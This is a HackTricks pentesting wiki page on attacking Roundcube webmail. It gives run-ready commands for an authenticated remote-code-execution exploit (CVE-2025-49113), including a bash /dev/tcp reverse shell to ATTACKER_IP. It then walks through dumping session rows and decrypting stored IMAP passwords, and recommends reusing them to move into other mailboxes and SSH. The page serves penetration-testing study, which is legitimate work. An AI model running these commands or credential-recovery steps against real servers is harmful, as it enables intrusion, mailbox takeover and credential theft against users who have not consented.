roundcube.md (5579B)
1 --- 2 title: "Roundcube" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/roundcube.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/roundcube.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Roundcube 14 15 ## Overview 16 17 Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints: 18 - HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion) 19 - Default app path in containers/VMs: /var/www/html/roundcube 20 - Main config: config/config.inc.php 21 22 ## Authenticated RCE via PHP object deserialization (CVE-2025-49113) 23 24 Affected versions (per vendor/NVD):<sup>[[1]](#references)[[2]](#references)</sup> 25 - 1.6.x before 1.6.11 26 - 1.5.x before 1.5.10 27 28 Bug summary 29 - The _from parameter in program/actions/settings/upload.php is not validated, enabling injection of attacker‑controlled data that Roundcube later unserializes, leading to gadget chain execution and remote code execution in the web context (post‑auth).<sup>[[3]](#references)</sup> 30 31 Quick exploitation 32 - Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld) 33 - Public PoC automates session handling, gadget crafting and upload flow<sup>[[4]](#references)</sup> 34 35 ```bash 36 git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git 37 php CVE-2025-49113.php http://mail.target.tld USER PASS CMD 38 39 # examples 40 php CVE-2025-49113.php http://mail.target.tld user 'pass' "id" 41 # blind timing proof 42 time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5" 43 44 # reverse shell 45 nc -nvlp 443 46 php CVE-2025-49113.php http://mail.target.tld user 'pass' \ 47 "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'" 48 ``` 49 50 Notes 51 - Output is often blind; use sleep N to validate RCE 52 - The resulting process inherits the account and confinement of the PHP/web worker; determine the actual identity rather than assuming `www-data`. Container indicators such as `/.dockerenv` and private bridge routes may help characterize the environment but are not universal. 53 54 ## Post‑exploitation: recover IMAP passwords from Roundcube sessions 55 56 Roundcube stores the current user's IMAP password as an encrypted value in its session. With both session-backend access and the server-side `des_key`/cipher configuration, an assessor can decrypt active-session credentials. The default cipher is historically `DES-EDE3-CBC`, but `cipher_method` is configurable (for example, AES-256-CBC), so do not assume every installation uses 3DES.<sup>[[6]](#references)[[7]](#references)</sup> 57 58 1) Read the DB DSN, encryption key, and cipher configuration 59 60 config/config.inc.php typically contains: 61 62 ```php 63 $config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube'; 64 $config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES) 65 ``` 66 67 2) Connect to DB and dump sessions 68 69 ```bash 70 mysql -u roundcube -p roundcube 71 # or: mysql -u roundcube -pDB_PASS roundcube 72 73 mysql> SELECT id, created, changed, vars FROM session\G 74 ``` 75 76 The `session.vars` field contains serialized session state. Locate the encrypted password value (commonly the `_password` session key) and pass that ciphertext—not the entire serialized `vars` value—to the matching Roundcube decrypt routine. 77 78 3) Locate the password field 79 80 A quick first step is to inspect the serialized field for the password key. Exact serialization depends on the Roundcube/PHP session handler: 81 82 ```bash 83 printf '%s' 'SESSION_VARS_VALUE' | tr ';' '\n' | grep -i password 84 ``` 85 86 4) Decrypt using Roundcube’s helper 87 88 Roundcube ships a CLI that uses the same rcmail->decrypt() logic and the configured des_key:<sup>[[5]](#references)</sup> 89 90 ```bash 91 cd /var/www/html/roundcube 92 ./bin/decrypt.sh CIPHERTEXT_BASE64 93 # -> prints plaintext 94 ``` 95 96 5) Manual decryption (optional; default 3DES example) 97 98 - Ciphertext format: Base64( IV(8B) || CT ) 99 - Alg: 3DES-CBC, key length 24B, PKCS#7 padding 100 101 ```python 102 from base64 import b64decode 103 iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME') 104 iv, ct = iv_ct[:8], iv_ct[8:] 105 print(iv.hex(), ct.hex()) 106 # decrypt(ct) with key = $config['des_key'], IV = iv 107 ``` 108 109 Common locations 110 - DB table: session (users table maps login names to IDs) 111 - Config path: /var/www/html/roundcube/config/config.inc.php 112 113 Operational use 114 - Older session rows often contain prior users’ IMAP passwords; decrypt multiple entries to laterally move into other mailboxes 115 - Try recovered credentials against SSH or other services if credential reuse is suspected 116 117 ## References 118 119 - [1] [Roundcube security updates 1.6.11 and 1.5.10](https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10) 120 - [2] [CVE-2025-49113 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-49113) 121 - [3] [Roundcube changelog — CVE-2025-49113 fix](https://github.com/roundcube/roundcubemail/blob/master/CHANGELOG.md) 122 - [4] [hakaioffsec/CVE-2025-49113-exploit (PoC)](https://github.com/hakaioffsec/CVE-2025-49113-exploit) 123 - [5] [Roundcube bin/decrypt.sh helper](https://raw.githubusercontent.com/roundcube/roundcubemail/master/bin/decrypt.sh) 124 - [6] [HTB Outbound – 0xdf write‑up (Roundcube 1.6.10 → RCE → session decrypt pivot)](https://0xdf.gitlab.io/2025/11/15/htb-outbound.html) 125 - [7] [Roundcube default configuration — `des_key` and `cipher_method`](https://github.com/roundcube/roundcubemail/blob/master/config/defaults.inc.php)